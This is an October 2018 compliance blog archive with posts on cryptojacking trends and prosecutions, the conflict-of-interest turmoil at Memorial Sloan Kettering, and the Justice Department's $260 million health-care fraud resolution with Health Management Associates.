Month: October 2018

Corporate compliance officers who have only general knowledge of longstanding cybersecurity threats, such as phishing and ransomware, need to familiarize themselves with the growing threat of “cryptojacking.”  Cryptojacking, also known as malicious cryptomining, is the unauthorized installation and use of cryptocurrency mining software on computers and mobile devices.

Cryptomining, of course, is integral to the verification of cybercurrency transactions and addition of those transactions to the blockchain digital ledger.  But cryptomining “consumes processor cycles and their requisite electricity to process cryptocurrency transactions,” while earning the cryptominer using his own computer only a small amount of cryptocurrency.   Because generation of more substantial amounts of cryptocurrency require vastly greater amounts of electricity and processing power, cybercriminals increasingly seek to outsource their cryptomining operations by obtaining unauthorized access to others’ computers, where they can draw on unused processing power.

If cryptojacking was already “out of control” in 2017, as a Wired article headline declared, more recent reports from cybersecurity firms indicate that cryptojacking in 2018 is (if it is possible) even more so:

• In June, a Kaspersky Labs report stated that during the 2017-2018 period, “cryptominer encounters rose in total number, from 1.9 million to 2.7 million, as well as in share of threats detected, from 3% to 4%.”
• In August, Trend Micro reported that in the first half of 2018, it had 787,146 cryptocurrency mining detections – 1,055 percent of the detections in the first half of 2017 (74,547) and 241 percent of the detections in the second half of 2017 (326,326) – and identified 47 new cryptomining malware families.
• In September, McAfee found that total cryptomining malware samples grew by 86 percent in the second quarter of 2018, and identified more than 2.5 million new cryptojacking files.

Moreover, certain features of current cryptojacking indicate that the problem is becoming more pervasive and more sophisticated:

• Geographic Expansion: Cryptojacking malware is being detected around the world, most notably in North and South America, Europe, and Asia.
• Expansion To and Within Corporate Entities: Cryptojacking is not limited to home computer users.  In July, Kaspersky Lab analysts reported that they had observed a new cryptojacking, Power Ghost, that “is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.”  According to a Forbes article, cryptojackers are increasingly targeting servers. “Running in corporate and cloud data centers, servers are both vast in number and far more powerful than PCs and mobile devices, presenting . . . a fertile field for planting cryptojacking software.”
• Infection Techniques: What makes PowerGhost more complex to detect and remove is its use of fileless techniques to embed the miner within the target system. The Kaspersky analysts noted that during the infection process, which can be done with exploits or remote administration tools, “a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive.”
• Location of Cryptojacking Malware: Cryptojacking software can be embedded in places that are atypical of other types of malware.  For example, security researchers reportedly “found cryptojacking code hidden on the Los Angeles Times’ interactive Homicide Report webpage that was quietly harnessing visitors’ CPUs to mine Monero cryptocurrency.”
• Malicious Response to Removal: 360 Total Security reported about one type of cryptomining malware that has been coded to ensure that an attempt to remove it will crash the computer. At the outset, the malware launches a system process that is part of the Windows operating system, svchost.exe, and injects malicious code into it.  It then sets svchost.exe’s attribute to “CriticalProcess.” That means that an attempt to terminate the malware will be read by the system as interference with a legitimate critical process in Windows and crash the computer.

Because cryptojacking necessarily involves unauthorized access to computers, law enforcement authorities are prepared to investigate and prosecute cryptojacking schemes as cybercrime.  During 2018, at least four countries pursued law enforcement actions against cryptojacking:

• China: 20 suspects were arrested “in a major cryptojacking case allegedly affecting over one million computers and generating 15 million yuan (about $2.2 million) in illicit profit.”
• Iceland: Police arrested 11 individuals in connection with the theft, from data centers in Iceland, of approximately 600 computers being used to mine bitcoin and other virtual currencies.
• Japan: Authorities arrested 16 men for allegedly using their websites to disseminate cryptomining malware, and a Japanese court reportedly sentenced a man who had used his blog to infect visitors with cryptomining malware, engaged in cryptomining to one year’s imprisonment (suspended for three years).
• Russia: Security officers arrested “several scientists working at a top-secret Russian nuclear warhead facility for allegedly mining crypto-currencies.”

Compliance officers and their information security counterparts therefore need to recognize that cryptojacking is a cybercrime and treat it accordingly.  That means conducting a thorough review of what their companies are doing to address cryptojacking, including ensuring that their companies are using artificial intelligence and other techniques to identify penetration of corporate networks by cryptojacking teams.  But it also means refreshing compliance training to increase employee awareness of cryptomining across the enterprise.  Employees who notice significant slowing of their computers should be encouraged to report such occurrences, as they may be indicative of cryptojacking malware at work.

Finally, cryptojacking training needs to make clear to corporate employees that using company resources for cryptomining is prohibited under all circumstances.  In one case, the cybersecurity firm Darktrace

picked up on puzzling traffic patterns within a European bank, including servers that seemed to be connecting from an IP address in the company’s data center. When they inspected it in person, by physically tracing cables, its experts realized that a rogue employee had set up a “c[r]ypto mining side business” under the floorboards.

In the past four weeks, the world-renowned Memorial Sloan Kettering Cancer Center (MSK) in New York has experienced considerable turmoil, as a result of a series of media reports focusing on substantial conflicts of interest by MSK senior leaders:

• On September 13, Dr. José Baselga, MSK’s chief medical officer, resigned his position, soon after the New York Times and ProPublica reported that Dr. Baselga had “fail[ed] to disclose millions of dollars in payments from health care companies,” including failure to disclose his outside financial ties in dozens of research articles that he had written for leading medical journals.
• On September 29, the Times and ProPublica reported that a MSK vice president, Dr. Gregory Raskin, was required to turn over to MSK nearly $1.4 million of a windfall stake in stock options he had received from a biotech company, Y-mAbs Therapeutics, for representing MSK on Y-mAbs’s board.
• On October 1, the Times and ProPublica reported that in an October 1 meeting with MSK’s staff, the chairman of MSK’s board of managers and overseers, Douglas A. Warner III, told the staff that Dr. Baselga “crossed lines that we should have done more to stop” and had gone “off the reservation” in his dealings with health-care and drug companies. Warner also acknowledged that “while we pushed back on a lot and discussed a lot, we were not as effective as we should have been,” and that Dr. Baselga “reported to me, and I wish I had done more to keep him away from the line.”

Note: MSK’s situation, even at this early stage of developments, contains four lessons that chief compliance officers in any industry should note and share with their companies’ senior executives.  First, corporate conflict-of-interest policies and associated standards and internal controls should leave no doubt about which types of outside financial interests are prohibited, which are permissible with appropriate full disclosure and prior approval, and which are permitted without the need for disclosure or prior approval.  According to ProPublica, Memorial Sloan Kettering did not have a prohibition against employees accepting personal compensation when they represent MSK on corporate boards. Other hospitals, cancer centers, and research institutions, however, have more clearly stated limitations or prohibitions on such outside ties. For example, the Cleveland Clinic reportedly prohibits employees from personally profiting when they are representing the Cleveland Clinic’s interests, and Partners HealthCare© (founded by Brigham and Women’s Hospital and Massachusetts General Hospital) has a highly detailed policy on employee interactions with industry and other outside entities.

Second, the rapid sequence of events that followed the initial reporting by the Times and ProPublica shows how quickly damage to corporate reputation and internal morale can expand when serious undisclosed intracorporate conflicts of interest are publicly reported.  In his meeting yesterday with MSK staff, Warner reportedly “acknowledged ‘widespread anger’ among staff members and that the hospital’s reputation had been harmed.”

Third, if a company needs to address an intracorporate crisis with the media, it must make sure that its key messages in public statements are consistent.  In MSK’s case, an MSK spokesperson stressed that Dr. Baselga resigned and was not fired, but also stated that in the October 1 meeting Warner and MSK’s chief executive, Dr. Craig B. Thompson, were referring not to Dr. Baselga’s ties to outside companies but to a “conflict of commitment.”  The spokesperson added, “Dr. Baselga wanted to take on more, join more boards, be involved in more outside efforts. . . . He was overextended.”  Inconsistencies in public disclosures may well invite further adverse media coverage and complicate the task of crisis management.

Finally, a company in the midst of a crisis management situation must take special pains to manage its dissemination of information about internal discussions while it is still formulating a comprehensive response to the crisis.  The October 1 report by the Times and ProPublica stated that a preliminary transcript of Warner’s meeting with the hospital staff “was inadvertently emailed by the hospital to a reporter for The New York Times.”

On September 25, the U.S. Department of Justice announced that Health Management Associates (HMA), formerly a Naples, Florida-headquartered hospital chain, had entered into an agreement with the Department requiring HMA to pay more than $260 million to resolve criminal and civil charges relating to defrauding the United States.  The Department alleged that HMA had engaged in

a corporate-driven scheme to defraud Federal health care programs by unlawfully pressuring and inducing physicians serving HMA hospitals to increase the number of emergency department patient admissions without regard to whether the admissions were medically necessary.  The scheme involved HMA hospitals billing and obtaining reimbursement for higher-paying inpatient hospital care, as opposed to observation or outpatient care, from Federal health care programs, increasing HMA’s revenue.

It also stated that HMA executives and HMA hospital administrators “executed the scheme by pressuring, coercing and inducing physicians and medical directors to meet the mandatory admission rate benchmarks and admit patients who did not need impatient admission through a variety of means, including by threatening to fire physicians and medical directors if they did not increase the number of patients admitted.”

To resolve the criminal investigation, HMA entered into a three-year Non-Prosecution Agreement (NPA) and a $35 million penalty to be paid by HMA. Under the NPA‘s terms, HMA and Community Health Services (CHS) – a hospital chain that acquired HMA after the alleged conduct at HMA occurred — agreed to cooperate with the Department’s investigation, report allegations or evidence of violations of federal health care offenses, and ensure that their compliance and ethics program satisfies the requirements of an amended and extended Corporate Integrity Agreement between CHS and the Department of Health and Human Services Office of Inspector General.  In addition, an HMA subsidiary, Carlisle HMA, LLC, agreed to plead guilty to one count of conspiracy to commit health care fraud, pertaining to a criminal information filed in the District of Columbia.

HMA also entered into a related civil settlement with the Department to resolve various claims and allegations of submission of false claims, paying remuneration to physicians in return for patient referrals, and submission of inflated claims for emergency department facility fees. As part of that settlement, HMA agreed to pay $216 million.

The allegations that the settlement resolved were originally brought in eight lawsuits filed under the qui tam (whistleblower) provisions of the False Claims Act.  Although the whistleblower shares have not been determined for all of those lawsuits,  the whistleblower in one of the cases will receive approximately $15 million as a share of the recovery, and the whistleblowers in a second case will receive approximately $12.4 million as their share of the recovery.

Note: This criminal and civil resolution with HMA is one of the most significant health care fraud-related cases that the Department of Justice (DOJ) has pursued against hospitals and hospital chains in recent memory.  The DHS – DOJ Health Care Fraud and Abuse Control Program Annual Report for Fiscal Year 2017 documents numerous instances of criminal cases against other categories of health care providers and services, such as medical providers operating “pill mills,” providers and clinics submitting false claims to Medicare, drug companies paying kickbacks to providers to prescribe their drugs, and pharmacies soliciting and receiving kickbacks from pharmaceutical companies for promoting their drugs.  In contrast, during Fiscal Year 2017, cases involving hospitals and health systems involved only civil settlements of liability under the civil False Claims Act, and the largest of those settlements was $57.5 million.

The resolution is also of interest for the breadth of alleged tactics that HMA executives and HMA hospital administrators used to increase emergency department patient admissions.  As a general proposition, federal laws such as the Anti-Kickback Statute and the Stark Law are designed, as the Department’s HMA release stated, “to ensure that physician decision-making is not compromised by improper financial incentives.”  Positive financial incentives, such as direct payments or reduced or free rent for office space, to make patient referrals are to be expected; negative financial incentives, such as threatening to fire physicians and medical directors for failure to increase patient admissions, are not.    Given the latter types of conduct mentioned in the HMA resolution, and HMA’s and CHS’s commitment to continue to cooperate with the Department, compliance officers who track health care fraud developments should not be surprised if the Department ultimately pursues cases against formerly HMA-affiliated individuals.